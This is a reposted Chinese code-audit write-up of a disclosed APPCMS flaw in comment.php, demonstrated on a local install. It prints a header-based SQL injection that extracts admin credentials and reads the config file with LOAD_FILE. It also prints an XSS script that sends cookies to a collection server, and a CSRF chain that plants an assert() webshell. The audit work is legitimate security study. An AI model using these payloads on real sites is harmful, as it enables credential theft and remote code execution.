模板户:专注于dede模板,织梦源码,织梦模板,网站模板,dedecms模板,网站源码,dedecms教程以及各类手机网站模板和企业网站模板分享.

织梦模板

VIP

代码审计| APPCMS SQL-XSS-CSRF-SHELL

www.mobanhu.com / 2019-03-12 08:27:17
Thinking 漏斗社区

0x01 背景


由若水师傅提供的一个素材,想要复现CNVD上披露的一个APPCMS的漏洞,由CNVD上的描述可以知道存在漏洞的地方是comment.php这个文件,然后就没有详细的漏洞信息了,所以就需要分析相应的源码文件找出存在漏洞的点。借这个素材捡起下代码审计的各种感觉。期待一起学习,期待和师傅们各种交流讨论。 
官方站点
:http://www.appcms.cc/ 
漏洞详情地址:

http://www.cnvd.org.cn/flaw/show/CNVD-2017-13891

0x02 审计过程

1. Thinking的心历路程

本篇是个事后总结,是在审计过程中逐步思考利用,然后达到预期的目的。 
先是进行了代码审计清楚了造成的漏洞的位置,开始先获得了用户名是admini,密文密码:77e2edcc9b40441200e31dc57dbb8829,安全码:123456;但是并无法得到后台地址,经过思考分析,便想到利用2次漏洞进行XSS打到后台地址和cookie,在深入些便是和CSRF结合得到shell,这便是我的心历路程。以下先说说代码审计部分。

(1)寻找漏洞位置

打开comment.php文件,通读comment.php文件中的代码,并跟踪数据的传递过程。CNVD上说的是一个SQL注入漏洞,所以可以先关注comment.php文件中涉及SQL操作的代码。

comment.php文件第80行-86行,目测query_update,single_insert存在SQL操作,进行SQL拼接的是TB_PREFIX$fields[parent_id]$fields

1.//comment.php文件第80行-86行
2.    if ($fields[parent_id] != 0) {
3.        $ress = $dbm -> query_update("UPDATE " . TB_PREFIX . "comment SET son = son + 1 WHERE comment_id = {$fields[parent_id]}");
4.    }
5.    $res = $dbm -> single_insert(TB_PREFIX . comment, $fields);


其中TB_PREFIXcoreconfig.conn.php进行了define(TB_PREFIX, appcms_);定义,所以不用管TB_PREFIX。 

$fields[parent_id]在第73行$fields[parent_id] = $page[post][parent_id];if(!is_numeric($fields[parent_id])) die();进行了数据类型的判断,所以也不能利用。

$fields是由自定义方法function m__add()创建的一个数组,再将$page数组中关键的信息赋给$fields,而$page拥有所有POST和GET的数据; 
在 
m__add()自定义方法中可控的数据$fields[id],$fields[type],$fields[parent_id]必须是数字类型,所以无法利用,剩下$fields[uname] ,$fields[content],$fields[ip],后面经过测试和数据跟踪的过程$fields[ip]是一个可控制并可注入的点。

1.//comment.php文件第29-30行
2.$page[get] = $_GET; //get参数的 m 和 ajax 参数是默认占用的,一个用来执行动作函数,一个用来判断是否启用模板还是直接输出JSON格式数据
3.$page[post] = $_POST;
1.//comment.php文件第57-86行
2.function m__add() {
3.    global $page, $dbm, $c;
4.
5.    $fields = array();
6.    foreach($page[post] as $key => $val) {
7.        $page[post][$key] = htmlspecialchars(helper :: escape($val));
8.    }
9.    if (empty($page[post][comment])) {
10.        die({"code":"1","msg":"发表内容不能为空"});
11.    }
12.    $code = md5(strtoupper($page[post][code]));
13.    if ($code != $_SESSION[feedback]) {
14.        die({"code":"140","msg":"验证码错误"});
15.    }
16.    $fields[id] = $page[post][id];if(!is_numeric($fields[id])) die();
17.    $fields[type] = $page[post][type];if(!is_numeric($fields[type])) die();
18.    $fields[parent_id] = $page[post][parent_id];if(!is_numeric($fields[parent_id])) die();
19.    $content = $c -> filter_words($page[post][comment]);
20.    $fields[content] = helper :: utf8_substr($content, 0, 300);
21.    $user = $c -> filter_words($page[post][user], user);
22.    $fields[uname] = helper :: utf8_substr($user, 0, 10);
23.    $fields[date_add] = time();
24.    $fields[ip] = helper :: getip();
25.    if ($fields[parent_id] != 0) {
26.        $ress = $dbm -> query_update("UPDATE " . TB_PREFIX . "comment SET son = son + 1 WHERE comment_id = {$fields[parent_id]}");
27.    }
28.    $res = $dbm -> single_insert(TB_PREFIX . comment, $fields);
29.    if (empty($res[error]) && empty($ress[error])) die({"code":"0","msg":"恭喜发表成功"});
30.    die({"code":"1","msg":"发表失败: . $ress[error] . "});
31.}


之所以得到如上的结论,第一个,是在跟进single_insert方法的时候,在改方法中将$fields数组中的值使用foreach进行组合后传入$sql中没有经过任何处理。

1.//core/database.class.php第102-120行代码块
2. public function single_insert($table_name, $fields) {
3.        if (!is_array($fields) || count($fields) == 0) return array(sql => , error => 插入失败,插入字段为空, sql_time => 0, autoid => 0);
4.
5.        $sql_field = "";
6.        $sql_value = "";
7.        // 遍历字段和值
8.        foreach($fields as $key => $value) {
9.            $sql_field .= ",$key";
10.            $sql_value .= ",$value";
11.        }


第二个,跟进$fields[ip] = helper :: getip();getip()方法,发现获取的方式中有一项是CLIENT-IP,这种方式可以通过客户端进行IP伪造。

1.//core/help.class.php文件的第47-57行
2. public static function getip() {
3.        $onlineip = ;
4.        if (getenv(HTTP_CLIENT_IP) && strcasecmp(getenv(HTTP_CLIENT_IP), unknown)) {
5.            $onlineip = getenv(HTTP_CLIENT_IP);
6.        } elseif (getenv(REMOTE_ADDR) && strcasecmp(getenv(REMOTE_ADDR), unknown)) {
7.            $onlineip = getenv(REMOTE_ADDR);
8.        } elseif (isset($_SERVER[REMOTE_ADDR]) && $_SERVER[REMOTE_ADDR] && strcasecmp($_SERVER[REMOTE_ADDR], unknown)) {
9.            $onlineip = $_SERVER[REMOTE_ADDR];
10.        }
11.        return $onlineip;
12.    }

因此$fields[ip]的值满足用户可控且数据未经过安全处理直接拼接传入SQL语句,造成了insert注入。为了方便查看和构造payload,我在/core/database.class.php文件的single_insert方法的117行加入 echo $sql;方便查看SQL语句,又由于这个CMS的存在失效的图片验证,所以可以轻松的使用burpSuite进行注入获取数据。

(2)构造payload获取用户名密码

接下来构造PAYLOAD,这个位置是insert注入但是并不会报SQL的错误,所以无法使用报错注入,在师傅们的指导提醒下发现可以直接使用insert将注入查询到的结果回显到前台中,由于这个是个评论功能,那么展示的位置是content,uname,date_add,ip这4个位置。

可以直接使用如下的语句将查询结果插入到content和uname,然后回显到前台的用户名和回复内容位置。 
PAYLOAD: 
CLIENT-IP:10.10.10.1),(1,0,0,(select upass from appcms_admin_list where uid= 1),(select uname from appcms_admin_list where uid= 1),1510908798,1)#

(3)构造payload获取安全码

此时就获得到站点的用户名和密码,接下来要获取安全码,这里使用mysql的load_file()来读取coreconfig.php文件,安全码等敏感信息就在该文件里面。 
可以使用去掉payload后面的#导致报错等方式得到网站的绝对路径,因为在coreinit.php中默认开启了错误提示,所以可以利用错误信息得到绝对路径。

得到绝对路径便可以使用load_file()去读取coreconfig.php文件中的安全码了,但是这里content列是使用varchar,然后长度是500,所以直接使用load_file()是无法获得安全码的,因此使用了substr进行了截断,截断范围大致是 从480开始 然后截断400个字符长度,此处没有进行了预测没有精准计算,但是已经将安全码写到content列中了。 
PAYLOAD: 
CLIENT-IP:10.10.10.1),(1,0,0,(SUBSTR(LOAD_FILE(D:\soft\phpStudy\WWW\APPCMS\core\config.php), 480 , 400)),thinking,1510908798,123456)#

此时已经得到用户名是admini,密文密码:77e2edcc9b40441200e31dc57dbb8829,安全码:123456;但是APPCMS安装完毕后强制更改后台地址,所以就是拿到这3个敏感信息也难以登录后进行其他操作。

2. Thinking的心历路程

以上通过代码审计已经分析了CNVD上该版本的APPCMS漏洞产生的整个过程,接下来是对这个漏洞进行进阶研究和学习。所先这种insert注入将用户可控的数据直接写到数据库中,极大的可能还会造成2次漏洞,本小节利用insert注入直接进行存储型XSS打后台,且使用CSRF在添加模块的地方进行写马操作。

(1)XSS注入测试

常规测试 忽略 :!)

(2)COOKIE平台

这里我使用的蓝莲花团队的xss平台。

PAYLOAD构造:

这里我对内容进行的修改添加了两个请求,一个是创建文件的请求,一个是为文件添加内容的请求。

1.//获取站点的关键信息
2.var website="http://127.0.0.1/xsser";
3.(function(){(new Image()).src=website+/?keepsession=1&location=+escape((function(){try{return document.location.href}catch(e){return}})())+&toplocation=+escape((function(){try{return top.location.href}catch(e){return}})())+&cookie=+escape((function(){try{return document.cookie}catch(e){return}})())+&opener=+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:}catch(e){return}})());})();
4.
5.function csrf_shell()
6.
{
7.//创建文件名为evil.php的文件
8.var xmlhttp1=new XMLHttpRequest();
9.xmlhttp1.open("POST","./template.php?m=create_file",true);
10.xmlhttp1.setRequestHeader("Content-type","application/x-www-form-urlencoded");
11.xmlhttp1.send("filename=evil.php");
12.
13.//在evil.php文件中写入一句话
14.var xmlhttp2=new XMLHttpRequest();
15.xmlhttp2.open("POST","./template.php?m=save_edit",true);
16.xmlhttp2.setRequestHeader("Content-type","application/x-www-form-urlencoded");
17.xmlhttp2.send("filename=evil.php&content=%3C%3Fphp+assert%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E");
18.};
19.csrf_shell();

(3)测试是否利用成功

配置好后进行如下请求,此时后台会生成一条评论记录。

模拟管理员登录后台,使用burpload进行跟踪,发现创建了evil.php文件,并为文件写入一句话,证明成功执行了刚才配置好的脚本,然后还将站点的信息包括登录信息等也发给了目标系统。

此时便收到打回来的COOKIE信息了,而对对应的shell地址便是http://127.0.0.1/APPCMS/templates/default/evil.php

0x03 小小总结


本篇获取后台的方法我就想到了XSS,本想使用报错的方式,但发现前台并无数据和后台进行交互,所以没想到怎么在前台引发报错,报出后台地址,所以就采用SQL注入,XSS,CSRF直接getShell了。如果师傅们有更好的思路期待讨论交流,感谢若水师傅提供的素材,感谢各位师傅的指导。

通往白帽子的奇妙世界


    发送中

    本文由AB模板网:织梦模板整理发布,转载请说明出处:https://www.mobanhu.com
    上一篇:进行网站建设必须要掌握的基础知识
    下一篇:没有了
    随机站长资讯
    网站改版页面url要做哪些注意
    seo对企业的帮助有哪些
    外贸网站如何才能发挥作用
    五年之后,你还认识SEO吗?
    网站seo要远离以下几点作弊
    最新站长资讯
    网站建设:seo优化的重要操作项目有哪些?
    怎样做SEO优化才能达到最大效益?
    更好的优化seo应该采取什么措施?
    进行网站建设必须要掌握的基础知识
    企业网站优化效果评估方法
    首页 免费源码 VIP专区 会员中心
    收缩